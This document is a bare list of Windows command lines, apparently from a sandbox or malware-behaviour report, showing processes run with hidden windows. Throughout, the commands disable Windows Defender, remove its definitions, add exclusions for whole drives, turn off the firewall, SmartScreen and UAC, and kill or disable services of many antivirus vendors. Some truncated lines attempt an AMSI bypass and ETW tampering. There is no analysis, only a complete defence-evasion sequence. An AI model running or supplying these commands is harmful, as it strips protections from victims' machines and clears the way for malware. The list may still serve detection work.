- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
- '<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop WinDefend"
- '<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc"
- '<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop Sense"
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Disa...
- '<SYSTEM32>\cmd.exe' /c ""%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -MAPSReporting Disabled""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -SubmitSamplesConsent NeverSend""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%APPDATA%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%HOMEPATH%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%'""
- '<SYSTEM32>\cmd.exe' /c "netsh advfirewall set allprofiles state off"
- '<SYSTEM32>\cmd.exe' /c "netsh firewall set opmode mode=disable"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9...
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f"
- '<SYSTEM32>\sc.exe' stop "WinDefend"
- '<SYSTEM32>\sc.exe' stop "McAfee McShield"
- '<SYSTEM32>\sc.exe' stop "WdNisSvc"
- '<SYSTEM32>\sc.exe' config "WinDefend" start= disabled
- '<SYSTEM32>\sc.exe' config "NS" start= disabled
- '<SYSTEM32>\sc.exe' config "epfwwfp" start= disabled
- '<SYSTEM32>\sc.exe' stop "KLIF"
- '<SYSTEM32>\sc.exe' config "CmdAgent" start= disabled
- '<SYSTEM32>\sc.exe' config "SecurityHealthService" start= disabled
- '<SYSTEM32>\sc.exe' config "WdNisSvc" start= disabled
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '<Full path to file>'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess '<File name>.exe'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%TEMP%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%APPDATA%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.exe'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.dll'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.scr'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MsMpEng.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpCmdRun.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NisSrv.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthService.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthSystray.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM smartscreen.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpDlpService.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SgrmBroker.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseIR.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseCncProxy.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseSampleUploader.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastSvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastUI.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswidsagent.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswToolsSvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastEmUpdate.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVGSvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgui.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgidsagent.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgwdsvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avp.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avpui.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM kavtray.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klnagent.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klwtblfs.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksde.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksdeui.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdagent.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdservicehost.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdredline.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdwtxag.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsserv.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM updatesrv.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NortonSecurity.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM nsWscSvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM Norton_WSC.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ccSvcHst.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM McAPExe.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfemms.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfevtp.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfefire.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfewc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ModuleCoreService.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamservice.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamtray.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MBAMWsc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ekrn.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM egui.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM eguiProxy.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosHealth.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosUI.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SAVService.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM swi_service.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PccNTMon.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMSRV.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMServer.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmListen.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmProxy.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cmdagent.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cfp.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cis.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSA.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSkyClient.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSANHost.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSKMAD.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSUAService.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fshoster32.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fsguiexe.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fssm32.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVK.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKWCtl.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKProxy.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2service.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2guard.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM zlclient.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsmon.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM wscsvc.exe /T"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "WinDefend""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "WinDefend" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "WdNisSvc""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "WdNisSvc" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "Sense""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "Sense" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "wscsvc""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "wscsvc" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "SecurityHealthService""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "SecurityHealthService" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "avast! Antivirus""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "avast! Antivirus" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "aswbIDSAgent""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "aswbIDSAgent" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "AvastWscReporter""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "AvastWscReporter" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVG Antivirus""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "AVG Antivirus" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "avgfws""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "avgfws" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "avgwd""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "AVP18.0.0" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVP18.0.0""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "avgwd" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "klim6""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "klim6" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "KLIF""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "KLIF" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "bdredline""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "bdredline" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "VSSERV""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "VSSERV" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "bdagent""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "bdagent" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "Norton Security""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "Norton Security" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "NS""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "NS" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "McAfee McShield""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "McAfee McShield" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "mfevtp""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "mfevtp" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "mfefire""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "mfefire" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "MBAMService""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "MBAMService" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "mbamwsc""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "mbamwsc" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "ekrn""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "ekrn" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "epfw""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "epfw" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "epfwwfp""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "epfwwfp" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "Sophos Agent""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "Sophos Agent" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "SAVService""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "SAVService" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "swi_service""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "swi_service" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "TMBMServer""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "TMBMServer" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "TmListen""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "TmListen" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "TmProxy""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "TmProxy" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "CmdAgent""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "CmdAgent" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "cmdvirth""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "cmdvirth" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "WRSA""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "WRSA" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "WRCoreService""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "WRCoreService" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "PandaAetherAgent""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "PandaAetherAgent" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "PSUAService""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "PSUAService" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "F-Secure Gatekeeper Handler Starter""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "F-Secure Gatekeeper Handler Starter" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "FSMA""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "FSMA" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "FSDFWD""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "FSDFWD" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVKWCtl""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "AVKWCtl" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVKProxy""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "AVKProxy" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "a2AntiMalware""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "a2AntiMalware" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "a2service""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "a2service" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "vsmon""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "vsmon" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop "zlclient""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config "zlclient" start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($nul...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_e...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop WinDefend"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "sc stop Sense"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Disa...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -MAPSReporting Disabled""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -SubmitSamplesConsent NeverSend""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%APPDATA%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%HOMEPATH%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%'""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "netsh advfirewall set allprofiles state off"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "netsh firewall set opmode mode=disable"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f"' (with hidden window)